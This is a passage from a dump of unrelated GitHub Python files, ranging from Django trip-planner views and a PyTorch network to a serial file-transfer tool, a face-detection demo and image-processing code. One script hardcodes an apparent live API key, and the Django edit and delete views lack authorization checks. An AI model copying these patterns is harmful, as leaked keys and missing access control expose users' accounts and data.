NotExistance(validators.FancyValidator):\n\tmessages = {\n\t\t\"already_exists\": \"Such type already exists\"\n\t}\n\n\tdef __init__(self, modelType, *args):\n\t\tself.modelType = modelType\n\t\tself.fields = args\n\n\tdef _validate_python(self, value, state=None):\n\t\tprint('value =', value)\n\t\tif twc.Invalid in value.values():\n\t\t\treturn value\n\t\tcryteria = dict([(i, value[i]) for i in self.fields])\n\t\tprint(cryteria)\n\t\tif self.modelType.checkIsExists(**cryteria):\n\t\t\traise formencode.Invalid(\n\t\t\t\tself.message(\"already_exists\", state),\n\t\t\t\tvalue, state)\n\t\treturn value\n\n\nclass ExistByPrimaryKey(validators.FancyValidator):\n\tmessages = {\n\t\t\"not_exists\": \"Object with given key not exists\"\n\t}\n\n\tdef __init__(self, modelType):\n\t\tself.modelType = modelType\n\n\tdef _validate_python(self, value, state=None):\n\t\tprint('value =', value)\n\t\tif not self.modelType.getById(value):\n\t\t\traise formencode.Invalid(\n\t\t\t\tself.message(\"not_exists\", state),\n\t\t\t\tvalue, state)\n\t\treturn value\n","repo_name":"keksovmen/NARFU_Arhitecture","sub_path":"PZ5/pz5/forms/CustomValidators.py","file_name":"CustomValidators.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36902155256","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\n\nfrom .models import *\nimport bcrypt\n\n# Create your views here.\ndef display_login_and_register_page(request): #displaying page for login/register // url will be ''\n return render(request, 'index.html') #creating the html page // 2 forms\n\ndef create_user(request): #url will be path(/create)\n errors = User.objects.basic_validator(request.POST) #validations\n\n if len(errors) > 0: #this is for the validations // if there is more than 1 error you will be redirected to the same page and try again\n for key, err in errors.items():\n messages.error(request, err)\n return redirect('/')\n\n\n hashed_pw = bcrypt.hashpw( #to hash the password\n request.POST['password'].encode(),\n bcrypt.gensalt()\n ).decode()\n\n created_user = User.objects.create( #creating the user // attributes \n first_name= request.POST['first_name'], #orange has to match models\n last_name= request.POST['last_name'], #yellow has to match name inside of html\n email= request.POST['email'],\n password = hashed_pw,\n )\n\n request.session['user_id'] = created_user.id #saving the user id to session // will refer to this later\n return redirect('/dashboard')\n\ndef login(request):\n potential_users = User.objects.filter(email=request.POST['email']) #email if not just change to username\n if len(potential_users) == 0:\n messages.error(request,\"Email is not in our system\") #checking validations\n return redirect('/') #will redirect you to the same page\n user = potential_users[0] #first user\n\n if not bcrypt.checkpw(request.POST['password'].encode(),user.password.encode()):\n messages.error(request, \"Please check your email and password\")\n\n\n return redirect('/')\n \n request.session['user_id'] = user.id #ADD THE REQUEST.SESSION FROM ABOVE\n return redirect('/dashboard') \n\n\n\n\n############################# ABOVE IS THE LOGIN AND REG PAGE ######################\n\n############ BELOW DASHBOARD PAGE ############\n\ndef display_dashboard_page(request): \n if \"user_id\" not in request.session:\n messages.error(request, \"You must be logged in to view that page.\") \n return redirect(\"/\") #will have to take in all trips // have to get a specific user which comes from the session\n \n\n\n context= {\n \"trips\":Trip.objects.all(), #COMMA!!\n \"user\":User.objects.get(id=request.session[\"user_id\"])\n }\n \n return render(request, \"dashboard_page.html\",context)\n\n############ CREATING TRIP BELOW ############\n\ndef create_trip_page(request): #have its own webpage url /trips/new #just the page passing all specific users\n context = {\n \n \"user\":User.objects.get(id=request.session[\"user_id\"]) #using session \n }\n\n return render(request, \"create_trip_page.html\", context) #create the html page\n\n\ndef create_trip_action(request):\n errors=Trip.objects.basic_validator(request.POST)\n\n\n if len(errors) >0:\n for err in errors.values():\n messages.error(request, err)\n return redirect(\"/trips/new\") #UPDATE THE REDIRECT WITH EVERY FUNCTIONS VALIDATIONS #\n \n\n Trip.objects.create(\n destination=request.POST[\"destination\"],\n start_date=request.POST[\"start_date\"],\n end_date=request.POST[\"end_date\"],\n plan=request.POST[\"plan\"],\n user = User.objects.get(id=request.session['user_id']) #need to include to make the connection\n )\n\n return redirect(\"/dashboard\")\n\n\ndef edit_trip_page(request, trip_id): #id to know which trip\n trip=Trip.objects.get(id=trip_id) #creating a variable\n trip.start_date=trip.start_date.strftime(\"%Y-%m-%d\") \n trip.end_date=trip.end_date.strftime(\"%Y-%m-%d\")\n\n context={\n \"trip\": trip, #refering to the variable\n \"user\":User.objects.get(id=request.session[\"user_id\"]) #including session user id // we need a specific user\n }\n return render(request, \"edit_page.html\", context)\n\n\ndef edit_trip_action(request, trip_id):\n errors=Trip.objects.basic_validator(request.POST) #validations\n\n if len(errors) >0:\n for err in errors.values():\n messages.error(request, err)\n return redirect(f\"/trips/edit/{trip_id}\") #f string bc he need the trip id inside the url \n \n\n newtrip=Trip.objects.get(id=trip_id) #creating a variable\n\n newtrip.destination=request.POST[\"destination\"] #refering to the new variable\n newtrip.start_date=request.POST[\"start_date\"]\n newtrip.end_date=request.POST[\"end_date\"]\n newtrip.plan=request.POST[\"plan\"]\n\n newtrip.save() ##### DONT FORGET TO SAVE ########################################\n\n return redirect(\"/dashboard\")\n\n\n######## EDIT TRIP PAGE AND EDIT ACTION PAGE ABOVE #######\n######## BELOW IS THE VIEW TRIP DECRIPTION PAGE######\n\ndef view_trip_page(request, trip_id):\n context={\n \"trip\": Trip.objects.get(id=trip_id),\n \"user\": User.objects.get(id=request.session[\"user_id\"])\n }\n return render(request, \"view_trip_page.html\", context)\n\n\ndef logout(request):\n request.session.pop(\"user_id\")\n\n return redirect('/')\n\n\n\n\ndef delete(request, trip_id): #deleting the specific trip\n trip=Trip.objects.get(id=trip_id)\n trip.delete() #dont forget\n\n return redirect(\"/dashboard\") \n\n\n","repo_name":"isaacsantiago24/Trip-Planner","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72091865706","text":"import multiprocessing as mp\nimport numpy as np\nfrom petitRADTRANS import Radtrans\nfrom petitRADTRANS import nat_cst as nc\nfrom platmy import utils\n\n# Check that folder structure is ok\nutils.check_folders()\nutils.clean_outputs()\n\n# Set parameters R and T\nradii = np.arange(1.5, 3.1, 0.2) * nc.r_earth\ntemperatures = np.arange(1000., 2001., 100.)\npressures = 0.01 * np.ones_like(temperatures)\n\n# Compute mass fraction abundances according to numerical abundances in abundances.inp\nabund_type = 'subsolar'\nutils.set_abundance_file(abund_type)\nabunds, mmws = utils.get_PT_abundances_MMW(pressures, temperatures)\n\n# Define Radtrans object\nline_species = ['C2H2', 'CH4', 'CO', 'CO2', 'H2', 'H2O', 'H2S', 'HCN', 'K', 'NH3', 'Na', 'OH', 'PH3', 'TiO', 'VO']\natmosphere = Radtrans(line_species=line_species,\n rayleigh_species=['H2', 'He'],\n continuum_opacities=['H2-H2', 'H2-He'],\n wlen_bords_micron=[0.6, 5.])\n\n# Set haze and pcloud parameters\nhaze_factor = 10.\npcloud = 0.01\ndescription = f'Model using {abund_type} abundances and haze_factor={haze_factor} and pcloud={pcloud}'\n\n# Define iterable with a grid of models\nmodels = [(r, temp, abund, mmw, atmosphere, haze_factor, pcloud, description)\n for r in radii for temp, abund, mmw in zip(temperatures, abunds, mmws)]\n\n# Run models in parallel\nwith mp.Pool(mp.cpu_count() - 1) as pool:\n results = pool.starmap(utils.make_model, models)\n","repo_name":"jorgeanais/platmy","sub_path":"scripts/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"768372419","text":"import requests\nimport json\n\n# customerId = 'your customerId here'\napiKey = 'ac21b41fd2a4c1cf2e3b8e1dace9ad57'\n\nurl = 'http://api.nessieisreal.com/customers?key={}'.format(apiKey)\npayload = {\n \"first_name\": \"Achudan\",\n \"last_name\": \"T Sadhasivam\",\n \"address\": {\n \"street_number\": \"501\",\n \"street_name\": \"Thomas Jefferson Rd\",\n \"city\": \"Herndon\",\n \"state\": \"VA\",\n \"zip\": \"20171\"\n }\n}\n# Create a Savings Account\nresponse = requests.post( \n\turl, \n\tdata=json.dumps(payload),\n\theaders={'content-type':'application/json'},\n\t)\n\nif response.status_code == 201:\n\tprint('account created')\nelse:\n print('customer failed')","repo_name":"HariVigneshG123/capital-one-analytics","sub_path":"postRequestCustomer.py","file_name":"postRequestCustomer.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22389347109","text":"from new_basic_block import *\nfrom Tkinter import *\nfrom collections import OrderedDict\n\n\ndef create(text,fn):\n\tf = open(fn,\"r\")\n\tjumps = ['jmp','jge','jgt','jlt','jle']\n\tlist_blocks = []\n\tinstrn = f.readline()\n\tpat = \"[a-z|A-Z][a-z|A-Z|0-9]*[\\s]*:\"\n\tcount = 1\n\n\tb = block()\n\tb.start = count\n\tend_file=False\n\t\n\tblock_d = {}\t\n\n\twhile instrn :\n\t\tinstrn = instrn.strip() \n\t\ttemp = instrn\n\t\tfirst_word = instrn.split(' ')[0]\n\t\tinstrn = f.readline()\n\n\t\tif(first_word in jumps):\n\t\t\tb.end = count\n\t\t\tlist_blocks.append(b)\n\t\t\tb.instrn_list[count] = temp\n\t\t\tb.instrn_numbs.append(count)\n\n\t\t\tif(instrn):\n\t\t\t\tb = block()\n\t\t\t\tb.start = count + 1\n\t\t\t\tend_file=False\n\t\t\telse:\n\t\t\t\tend_file = True\n\n\t\telif(re.match(pat,first_word)):\n\t\t\tsecond_word = temp.split(' ')[1]\n\t\t\n\t\t\tif(count is not 1):\n\t\t\t\tb.end = count - 1\n\t\t\t\tlist_blocks.append(b)\n\t\t\n\t\t\tb = block()\n\t\t\tb.start = count\n\n\t\t\tif(second_word in jumps):\n\t\t\t\tb.end = b.start\n\t\t\t\tb.instrn_list[count] = temp\n\t\t\t\tb.instrn_numbs.append(count)\n\t\t\t\tlist_blocks.append(b)\n\t\t\t\tb=block()\n\t\t\t\tb.start = count + 1\n\t\t\t\n\t\t\tb.instrn_list[count] = temp\t\t\n\t\t\tb.instrn_numbs.append(count)\n\t\telse:\n\t\t\tb.instrn_list[count] = temp\n\t\t\tb.instrn_numbs.append(count)\n\t\n\t\tcount = count + 1\n\t\n\tif(not end_file):\n\t\tb.end = count - 1\n\t\tlist_blocks.append(b)\n\t\n\n\ti = 1\n\tfor b in list_blocks:\n\t\tblock_d[\"BASIC\"+str(i)] = b.display\n\t\ti = i + 1\n\t\tb.display(text)\t\n\n\t\n\treturn list_blocks\n\n","repo_name":"soniyasadalkar/BasicBlockProject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18556121226","text":"import torch\nimport torch.nn as nn\n\nclass PermInvariantQNN(torch.nn.Module):\n \"\"\"\n Permutation Invariant Network\n \n :param in_invar_dim: Number of total features across all agents that needs to be perm invariant \n :param non_invar_dim: Number of total features constant across all agents\n :param out_dim: Dimension of output\n :param block_size: Number of invariant features of each agent\n :param num_moments: Number of features/moments to summarize invariant features of each agent\n :raises assertError: Raise assertion error if in_invar_dim not multiple of block size\n \"\"\"\n \n block_size: int\n in_invar_dim: int\n non_invar_dim: int\n num_moments: int\n out_dim: int\n\n def __init__(self, in_invar_dim, non_invar_dim,\n out_dim, block_size=1, num_moments=1):\n super(PermInvariantQNN, self).__init__()\n\n # Store input and output dimensions\n self.in_invar_dim = in_invar_dim\n self.non_invar_dim = non_invar_dim\n self.block_size = block_size\n self.num_moments = num_moments\n self.out_dim = out_dim\n\n # Verify invariant dimension is multiple of block size\n assert not self.in_invar_dim % self.block_size, \"in_invar_dim must be a multiple of block size.\"\n\n # Compute Number of blocks\n self.num_blocks = self.in_invar_dim / self.block_size\n\n # Define Networks\n self.moment_encoder_net = nn.Sequential(\n nn.Linear(self.block_size, 20),\n nn.LeakyReLU(),\n nn.Linear(20, 20),\n nn.LeakyReLU(),\n nn.Linear(20, self.num_moments),\n #nn.BatchNorm1d(self.num_moments)\n )\n\n self.decoder_net = nn.Sequential(\n nn.Linear(self.num_moments + self.non_invar_dim, 20),\n nn.ReLU(),\n nn.Linear(20, 20),\n nn.ReLU(),\n nn.Linear(20, self.out_dim)\n )\n\n def forward(self, invar_input, non_invar_input):\n # Reshape invar_input into blocks and compute \"moments\"\n invar_split = torch.split(invar_input, self.block_size, dim=1)\n invar_moments = sum((self.moment_encoder_net(ch) for ch in invar_split))\n\n # Concat moment vector with non-invariant input and pipe into next layer\n cat_input = torch.cat((invar_moments, non_invar_input), dim=1)\n\n # Output Final Tensor\n out_tensor = self.decoder_net(cat_input)\n return out_tensor","repo_name":"p-casgrain/Nash-DQN","sub_path":"Nash DQN - Old/nashRL_netlib.py","file_name":"nashRL_netlib.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"37"} +{"seq_id":"70385138029","text":"from classes.FileService import FileService\n\nnew_file_system = FileService()\n\n\nwhile True:\n command = input(\"set - сохранить файл по ID\\n get - выдача сохраненного файла\\n del - удаление по ID\\n change - изменение ID сохраненного файла\\n few - получение нескольких файлов по ID\\n backup - бэкап в файл\\n recover - восстановление из файла\\n view - посмотреть файлы \\n exit - выход:\\n \")\n if command == \"exit\":\n print(\"Вы вышли\")\n exit(0)\n elif command == \"set\":\n print(\"ваш id : \",new_file_system.set_file(input(\"Укажите имя файла:\\n\")))\n elif command == \"get\":\n try:\n print(new_file_system.get_file(int(input(\"Укажите id файла:\\n\"))))\n except NonExistentException as e:\n print(f\"SMTH WRONG: {e} \")\n\n elif command == \"del\":\n try:\n print(new_file_system.del_file(int(input(\"Укажите ID файла:\\n\"))))\n except NonExistentException as e:\n print(f\"SMTH WRONG: {e} \")\n elif command == \"change\":\n try:\n print(new_file_system.change_id(int(input(\"Укажите id файла:\")),int(input(\"Укажите новый id файла:\"))))\n except IncorrectArgExeption as e:\n print(f\"SMTH WRONG: {e} \")\n elif command == \"few\":\n print(new_file_system.get_few_files(input(\"Укажите ID файлов через пробел:\\n\")))\n elif command == \"backup\":\n print(new_file_system.backup())\n elif command == \"recover\":\n print(new_file_system.recover())\n elif command == \"view\":\n print(\"Your files: \")\n new_file_system.view_data()\n else:\n print(\"This command doesn't exist\")\n\n\n","repo_name":"ArtemShev/uni_works","sub_path":"prog_lang/lab_2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25971297153","text":"import yaml\nfrom typing import Optional\n\n\nclass Confing:\n\n def __init__(self):\n self.ip_address: Optional[str] = None\n self.port: Optional[str] = None\n self.redis: Optional[dict] = None\n\n def load_config(self, path_to_config: str):\n with open(path_to_config) as f:\n config_d = yaml.safe_load(f)\n api_conf = config_d[\"api\"]\n self.port = api_conf.get(\"port\") or None\n self.ip_address = api_conf.get(\"ip_address\") or None\n self.redis = config_d[\"redis\"]\n\n\nclass ConfingAlgo:\n def __init__(self):\n self.receiver: Optional[dict] = None\n self.sender: Optional[dict] = None\n self.service_type: Optional[str] = None\n self.pdf_parameters: Optional[dict] = None\n\n def load_config(self, path_to_config: str):\n with open(path_to_config) as f:\n config_alg = yaml.safe_load(f)\n self.receiver = config_alg[\"receiver\"]\n self.sender = config_alg[\"sender\"]\n self.service_type = config_alg[\"service_type\"]\n self.pdf_parameters = config_alg[\"pdf_parameters\"]\n\n def to_dict(self) -> dict:\n return {\n \"sender\": self.sender,\n \"receiver\": self.receiver,\n \"service_type\": self.service_type,\n \"pdf_parameters\": self.pdf_parameters\n }\n\n def update(self, config_dict: dict):\n self.receiver = config_dict[\"receiver\"]\n self.sender = config_dict[\"sender\"]\n self.service_type = config_dict[\"service_type\"]\n self.pdf_parameters = config_dict[\"pdf_parameters\"]\n\n\ncf = Confing()\ncf_algo = ConfingAlgo()\n\nif __name__ == '__main__':\n conf_algo = ConfingAlgo()\n conf_algo.load_config(\"config_app.yaml\")\n","repo_name":"matikurcze00/CherryPickers","sub_path":"API/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12681236638","text":"#!/usr/bin/env python3\n\"\"\"Command line entry point\"\"\"\n\nimport sys\nimport logging\nimport argparse\nfrom pathlib import Path\n\nimport serial\nfrom serial.tools import list_ports, list_ports_common\n\nfrom . import core, name\n\nlogging.basicConfig(level=logging.DEBUG)\nLOG = logging.getLogger()\n\ndef get_serial_device() -> list_ports_common.ListPortInfo:\n if sys.platform == \"darwin\":\n return next(list_ports.grep(\"usbserial\"))\n return next(list_ports.grep(\"ttyusb0\"))\n\ndef send(args: argparse.Namespace) -> None:\n \"\"\"Send data file\"\"\"\n with open(str(args.file), \"rb\") as data_io:\n data = data_io.read()\n\n wire_data = core.WireFormat(args.file.name, data)\n try:\n usb_serial_port = args.device or get_serial_device()\n except StopIteration:\n LOG.critical(\"Serial device not found; exiting\")\n sys.exit(3)\n with serial.Serial(usb_serial_port.device, baudrate=args.baudrate) as serial_device:\n core.send(wire_data, serial_device)\n\ndef listen(args: argparse.Namespace) -> None:\n \"\"\"Listen for data\"\"\"\n try:\n usb_serial_port = args.device or get_serial_device()\n except StopIteration:\n LOG.critical(\"Serial device not found; exiting\")\n sys.exit(1)\n with serial.Serial(usb_serial_port.device, baudrate=args.baudrate) as serial_device:\n while True:\n try:\n core.listen_and_write(serial_device)\n except core.ListenError:\n LOG.warning(\"Error; continuing\")\n continue\n except KeyboardInterrupt:\n break\n\ndef main() -> None:\n \"\"\"Entry point\"\"\"\n parser = argparse.ArgumentParser(prog=name,\n description=\"send and receive data\")\n parser.add_argument(\"--baudrate\", \"-b\", type=int, default=115200)\n parser.add_argument(\"--device\", \"-d\", type=list_ports_common.ListPortInfo,\n default=None)\n subparsers = parser.add_subparsers(title=\"subcommands\",\n description=\"valid subcommands\")\n listen_parser = subparsers.add_parser(\"listen\", aliases=[\"l\"])\n send_parser = subparsers.add_parser(\"send\", aliases=[\"s\"])\n send_parser.add_argument(\"file\", type=Path, metavar=\"FILE\")\n listen_parser.set_defaults(func=listen)\n send_parser.set_defaults(func=send)\n args = parser.parse_args()\n\n try:\n args.func(args)\n except AttributeError:\n parser.print_help(sys.stderr)\n sys.exit(4)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"fionn/diode","sub_path":"diode/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"9964882710","text":"\n\nclass Person:\n def __init__(self, name, age):\n print('init called')\n self.name = name\n self.age = age\n\n def display(self):\n print('in display')\n print(\"Name-\", self.name)\n print(\"Age-\", self.age)\n # object of class MyClass\n\n # passing person object to\n # method of MyClass (self = person here)\n\n\n\nperson = Person('John', 40)\nperson.display() #displays everything in the block","repo_name":"SACHINKV14/MCS_00_Sachin_Core_Python","sub_path":"_12_oops/_00_basics/self_notes/class display.py","file_name":"class display.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9789949228","text":"import pandas as pd\n\nclass SaveSegmentData():\n\n def __init__(self) -> None:\n self.segment_count = 0\n self.segmented_data_dict = dict()\n\n def get_feature_and_category_condition(self,condition):\n split_key_value = condition.split(',')\n condition_dict = {item.split(':')[0]:item.split(':')[-1] for item in split_key_value}\n return condition_dict\n\n def create_and_save_segment(self,train_df,condition_dict):\n if '>' in condition_dict.get('categories'):\n condition = int(condition_dict.get('categories').split('>')[-1])\n column = condition_dict.get('feature')\n print(__name__,condition,column)\n segmented_index = train_df[train_df[column]>condition].index\n remaining_index =train_df[train_df[column]<=condition].index\n elif '<=' in condition_dict.get('categories'):\n condition = int(condition_dict.get('categories').split('<=')[-1])\n column = condition_dict.get('feature')\n print(__name__,condition,column)\n segmented_index = train_df[train_df[column]<=condition].index\n remaining_index = train_df[train_df[column]>condition].index\n else:\n condition = condition_dict.get('categories')\n column = condition_dict.get('feature')\n print(__name__,condition,column)\n segmented_index = train_df[train_df[column]==condition].index\n remaining_index = train_df[train_df[column]!=condition].index\n print(__name__,remaining_index)\n # self.new_train = remaining_index\n self.segmented_data_dict['segmented_index'+str(self.segment_count)] = segmented_index\n self.segmented_data_dict['remaining_index'] = remaining_index\n print(self.segmented_data_dict)\n self.segment_count += 1\n\n # def __call__(self):\n # return self.segmented_data_dict\n \n\n\n\n\n\n","repo_name":"Zidane786/Segmentation","sub_path":"segmentation/utils/save_segment_data.py","file_name":"save_segment_data.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34377700483","text":"from tools import *\n\n\n__author__ = 'Håkon Hukkelås'\n\ndef do_task():\n im = Image.open(\"images/bush.tiff\")\n im.show()\n matrix = image_to_matrix(im)\n im = applyFilterInFD(im.convert('L'),h_g)[0]\n im.show()\n new_im = matrix_to_image(aliasing(image_to_matrix(im)),'L')\n new_im.show()\n\ndo_task()\n","repo_name":"StianHanssen/Digital-Image-Processing","sub_path":"oving2/task_2b.py","file_name":"task_2b.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39229422206","text":"import pyautogui\nfrom sys import argv\nfrom json import load\n\nonce = '--once' in argv\n\npyautogui.PAUSE = 1\npyautogui.FAILSAFE = True\n\nw, h = pyautogui.size()\n\ncurrentX, currentY = pyautogui.position()\ndef shallRun():\n global currentX, currentY\n\n x, y = pyautogui.position()\n r = currentX != x or currentY != y\n\n if r:\n currentX, currentY = x, y\n return r\n\ndef getWords():\n file = open('words.json')\n return load(file)\n\ndef selectWord(words: [(str, int)], done: [int], letters):\n selected = list(filter(lambda x: letters in x[0] and not x[1] in done, words))\n if not len(selected):\n return\n selection = selected[0]\n \n if bool(selection):\n done.append(selection[1])\n\n return selection[0]\n\ndef main():\n words = getWords()\n done = []\n \n while True:\n letters = input(\"Lettres :\")\n\n selected = selectWord(words, done, letters)\n if not selected:\n continue\n\n print(\"🚀 ~ file: main.py:45 ~ selected:\", selected)\n if not not selected:\n pyautogui.leftClick()\n pyautogui.typewrite(selected)\n pyautogui.press('enter')\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Greensky-gs/bombparty-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24664046079","text":"# -*- coding: utf-8 -*-\n# !/usr/bin/python3\n# SkillFramework 1.0.0 face detection demo\n\nimport hilens\nimport cv2\nimport numpy as np\nfrom postprocess import im_detect_nms\n\n# 网络输入尺寸\ninput_height = 480\ninput_width = 480\n\n\ndef main():\n \"\"\" 利用SkillFramework进行人脸检测模型的推理 \"\"\"\n hilens.init(\"test\") # 参数要与创建技能时填写的检验值保持一致\n model_path = hilens.get_model_dir() + \"face_detection_demo.om\" # 模型路径\n model = hilens.Model(model_path)\n display_hdmi = hilens.Display(hilens.HDMI) # 图像通过hdmi输出到屏幕\n camera = hilens.VideoCapture()\n\n \n while True:\n # 1. 读取摄像头输入(yuv nv21)\n input_nv21 = camera.read()\n \n # 2. 转为bgr\n input_bgr = cv2.cvtColor(input_nv21, cv2.COLOR_YUV2BGR_NV21)\n src_image_height = input_bgr.shape[0]\n src_image_width = input_bgr.shape[1]\n \n # 3. 保留原图比例的resize为网络输入尺寸\n im_scale1 = float(input_width) / float(src_image_width)\n im_scale2 = float(input_height) / float(src_image_height)\n im_scale = min(im_scale1, im_scale2)\n input_bgr_rescaled = cv2.resize(input_bgr, None, None, fx=im_scale, fy=im_scale)\n input_bgr_resized = np.zeros((input_height, input_width, 3), dtype = np.uint8)\n input_bgr_resized[0:input_bgr_rescaled.shape[0],0:input_bgr_rescaled.shape[1],:] = input_bgr_rescaled\n \n # 3. 推理\n outputs = model.infer([input_bgr_resized.flatten()])\n \n # 4. 后处理得到人脸bounding box,恢复到原图比例,画人脸框\n detect_boxes = im_detect_nms(outputs[0])\n if len(detect_boxes) > 0:\n for rect in detect_boxes:\n left = max(rect[0] / im_scale, 0)\n top = max(rect[1] / im_scale, 0)\n right = min(rect[2] / im_scale, src_image_width)\n bottom = min(rect[3] / im_scale, src_image_height)\n cv2.rectangle(input_bgr, (int(left), int(top)), (int(right), int(bottom)), 255, 2)\n \n # 5. 输出图像,必须是yuv nv21形式\n output_nv21 = hilens.cvt_color(input_bgr, hilens.BGR2YUV_NV21)\n display_hdmi.show(output_nv21)\n\n\nif __name__ == \"__main__\":\n \n main()\n","repo_name":"huaweicloud/HiLens-Lab","sub_path":"official_examples/技能模板/Face_Detection_Template/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"9967440900","text":"# writing items in rows and columns in excel sheet\nheader = ['id', 'name', 'phone number']\nids = [1, 2, 3, 4]\nnames = ['sachin', 'virat', 'dravid', 'dhoni']\nphnum = [113, 114, 115, 116]\n\nimport xlsxwriter\n\nwb = xlsxwriter.Workbook('cric_player.xlsx')\nws = wb.add_worksheet(name='deatils')\n\n# for headers\nr0 = 0\nc0 = 0\nfor i1 in header:\n ws.write(r0, c0, i1)\n c0 += 1\n#using loops\nc1 = 0\nfor r1,id in zip(range(1,5),ids):\n ws.write(r1, c1, id)\nc2 = 1\nfor r1,name in zip(range(1,5),names):\n ws.write(r1,c2,name)\nc3=2\nfor r1,pnum in zip(range(1,5),phnum):\n ws.write(r1,c3,pnum)\n\nwb.close()","repo_name":"SACHINKV14/MCS_00_Sachin_Core_Python","sub_path":"practice 04 Dec/harsha_tasks/_27_dec_/_excel_file_5.py","file_name":"_excel_file_5.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29234081699","text":"#!/usr/bin/env python3\nimport os\nimport numpy as np \nfrom pylab import imshow, show\nfrom time import time\nfrom numba import autojit, jit, cuda\nfrom numpy import math\n\n\nTr = 0.3\nBLOCKDIM = (32,16)\nGRIDDIM = (32,16)\n\ndef timer(func):\n def deco(*args, **kwargs): \n start = time()\n res = func(*args, **kwargs)\n stop = time()\n print('function (%s) cost %f seconds' %(func.__name__,stop-start))\n return res \n return deco\n\n'''\n\t- claculating one pixel`s lbsp value\n\t- using gray image for LBSP\n'''\n@jit\ndef lbsp_pixel(img,base_w,base_h):\n\t\theight,width = img.shape\n\t\tlbsp_value = 0\n\t\t#run_idx = 15\n\t\tfor bias_w in (range(-2,3)):\n\t\t\tfor bias_h in range(-2,3):\n\t\t\t\tif abs(bias_w)+abs(bias_h) == 3 or abs(bias_w)+abs(bias_h) == 0 :\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tcoordinate_w = bias_w+base_w\n\t\t\t\t\tcoordinate_h = bias_h+base_h\n\t\t\t\t\tflag = 0\n\t\t\t\t\tif coordinate_w >= 0 and coordinate_h >= 0 and coordinate_w < width and coordinate_h < height :\n\t\t\t\t\t\t#pay attention here, type img is uint8, if no converting to float, will come some unknown problem\n\t\t\t\t\t\tif abs(np.float(img[base_h,base_w])-np.float(img[coordinate_h,coordinate_w])) <= np.float(img[base_h,base_w])*Tr :\n\t\t\t\t\t\t\tflag = 1\n\t\t\t\t\t#lbsp_value = lbsp_value + flag*(2**run_idx)\n\t\t\t\t\t#run_idx = run_idx - 1\n\t\t\t\t\tlbsp_value = (lbsp_value << 1) + flag\t\t\t\t\n\t\treturn lbsp_value\n\ndef debug_lbsp_pixel(img,base_x,base_y):\n\t\theight,width = img.shape\n\t\tlbsp_value = 0\n\t\t#run_idx = 15\n\t\tbins = []\n\t\tfor bias_x in (range(-2,3)):\n\t\t\tfor bias_y in range(-2,3):\n\t\t\t\tif abs(bias_x)+abs(bias_y) == 3 or abs(bias_x)+abs(bias_y) == 0 :\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tcoordinate_x = bias_x+base_x\n\t\t\t\t\tcoordinate_y = bias_y+base_y\n\t\t\t\t\tflag = 0\n\t\t\t\t\tif coordinate_x >= 0 and coordinate_y >= 0 and coordinate_x < width and coordinate_y < height :\n\t\t\t\t\t\tif abs(img[base_y,base_x]-img[coordinate_y,coordinate_x]) <= img[base_y,base_x]*Tr :\n\t\t\t\t\t\t\tflag = 1\n\t\t\t\t\t#lbsp_value = lbsp_value + flag*(2**run_idx)\n\t\t\t\t\t#run_idx = run_idx - 1\n\t\t\t\t\tlbsp_value = (lbsp_value << 1) + flag\t\n\t\t\t\t\tbins.append(flag)\n\t\tprint(\"value:\",lbsp_value,\"bins:\",bins)\t\t\t\n\t\treturn lbsp_value\n\n'''\n\t- claculating one image`s lbsp values\n\t- lbsp values save in parameter values\n'''\n#@timer\ndef compute_lbsp_without_GPU(img,values):\n\t\t(height, width) = img.shape\n\t\tfor w in range(width):\n\t\t\tfor h in range(height):\n\t\t\t\tvalues[h,w] = lbsp_pixel(img,w,h)\n\n\nlbsp_pixel_for_gpu = cuda.jit(device=True)(lbsp_pixel)\n@cuda.jit\ndef lbsp_gpu_kernel(img,values):\n\theight = img.shape[0]\n\twidth = img.shape[1]\n\tabs_X,abs_Y = cuda.grid(2)\n\tif abs_X < width and abs_Y < height:\n\t\tvalues[abs_Y,abs_X] = 